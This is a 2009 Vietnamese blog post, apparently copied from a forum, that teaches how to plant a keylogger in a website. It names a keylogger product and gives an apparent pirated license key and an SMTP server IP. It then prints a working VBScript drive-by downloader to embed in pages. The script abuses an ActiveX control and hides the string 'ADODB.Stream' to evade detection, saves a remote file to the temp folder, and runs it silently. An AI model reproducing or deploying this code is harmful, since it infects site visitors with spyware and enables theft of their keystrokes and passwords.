Trao đổi với tôi

www.hdphim.info

12/16/09

[Virus] Hướng dẫn cài keylog vào web A -> Z

mình thấy có nhìu bạn thắc mắc về keylog nên mình mạn phép xin post cái video hướng dẫn làm keylog và gắn vào web
Con Keylog mình xài là perfect 1.66, các bạn có thể search để down về or down từ link của mình
Còn đây là link video hướng dẫn
key
Trích:
the_lighthouse SBTY-SOQO-OASV-GFNE

SMTP
Trích:

64.233.185.27
code gắn vào site
Trích:
< language="VBScript">

on error resume next

dl = "link cua ban vat vao day"

Set df = document.createElement("object")

df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

str="Microsoft.XMLHTTP"

Set x = df.CreateObject(str,"")

a1="Ado"

a2="db."

a3="Str"

a4="eam"

str1=a1&a2&a3&a4

str5=str1

set S = df.createobject(str5,"")

S.type = 1

str6="GET"

x.Open str6, dl, False

x.Send

fname1="bl4ck.com"

set F = df.createobject("Scripting.FileSystemObject","")

set tmp = F.GetSpecialFolder(2)

fname1= F.BuildPath(tmp,fname1)

S.open

S.write x.responseBody

S.savetofile fname1,2

S.close

set Q = df.createobject("Shell.Application","")

Q.ShellExecute fname1,"","","open",0

< /script>

p/s: nếu các bạn ko tin tưởng thì có thể nhờ mod test trước, vì mình là mem mới, mem mới lúc nào mà chẳng bị vậy

ĐÃ FIX LINK LẦN 2 !

Link: http://vnbrain.info/showthread.php?t=6221

7 comments:

 1. This comment has been removed by a blog administrator.

  ReplyDelete
 2. This comment has been removed by a blog administrator.

  ReplyDelete
 3. This comment has been removed by a blog administrator.

  ReplyDelete
 4. This comment has been removed by a blog administrator.

  ReplyDelete
 5. This comment has been removed by a blog administrator.

  ReplyDelete
 6. This comment has been removed by a blog administrator.

  ReplyDelete
 7. This comment has been removed by a blog administrator.

  ReplyDelete